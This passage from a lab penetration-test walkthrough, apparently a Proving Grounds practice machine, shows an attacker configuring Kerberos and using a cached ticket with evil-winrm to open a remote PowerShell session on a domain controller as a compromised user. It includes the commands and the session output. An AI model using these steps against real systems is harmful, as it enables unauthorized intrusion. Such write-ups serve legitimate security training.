l.livingstone
The credential of the l.livingstone user has been validated
The user is able to both WinRM and RDP to the target system.
WinRM
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ echo -e '[realms]\n\n\tRESOURCED.LOCAL = {\n\t\tkdc = ResourceDC.resourced.local\n\t}' | sudo tee /etc/krb5.conf
[realms]
RESOURCED.LOCAL = {
kdc = ResourceDC.resourced.local
}Setting up the /etc/krb5.conf file
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ KRB5CCNAME=l.livingstone@ResourceDC.resourced.local.ccache evil-winrm -i ResourceDC.resourced.local -r RESOURCED.LOCAL
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> whoami
resourced\l.livingstone
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> hostname
ResourceDC
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.169.175
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.169.254Initial Foothold established to the target system as the l.livingstone user via WinRM